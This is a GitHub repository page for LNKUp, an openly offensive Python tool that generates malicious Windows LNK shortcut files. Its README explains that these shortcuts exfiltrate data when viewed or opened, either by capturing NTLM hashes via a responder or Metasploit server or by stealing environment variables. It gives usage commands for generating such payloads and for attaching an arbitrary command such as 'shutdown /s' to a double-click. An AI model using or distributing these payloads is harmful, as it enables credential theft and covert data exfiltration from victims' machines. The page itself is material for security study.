Skip to content
forked from Plazmaz/LNKUp

Generates malicious LNK file payloads for data exfiltration

Notifications You must be signed in to change notification settings

jymcheong/LNKUp

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 

Repository files navigation

LNKUp

LNK Data exfiltration payload generator

This tool will allow you to generate LNK payloads. Upon rendering or being run, they will exfiltrate data.

Info

I am not responsible for any actions you take with this tool!
You can contact me with any questions by opening an issue, or via my Twitter, @Plazmaz.

Known gotchas

  • This tool will not work on OSX or Linux machines. It is specifically designed to target windows.
  • There may be issues with icon caching in some situations. If your payload doesn't execute after the first time, try regenerating it.
  • You will need to run a responder or metasploit module server to capture NTLM hashes.
  • To capture environment variables, you'll need to run a webserver like apache, nginx, or even just this

Installation

Install requirements using
pip install -r requirements.txt

Usage

Payload types:

  • NTLM
  • Environment
    • Steals the user's environment variables.
    • Examples: %PATH%, %USERNAME%, etc
    • Requires variables to be set using --vars
    • Example usage:
      lnkup.py --host localhost --type environment --vars PATH USERNAME JAVA_HOME --output out.lnk

Extra:

  • Use --execute to specify a command to run when the shortcut is double clicked
    • Example:
      lnkup.py --host localhost --type ntlm --output out.lnk --execute "shutdown /s"

About

Generates malicious LNK file payloads for data exfiltration

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%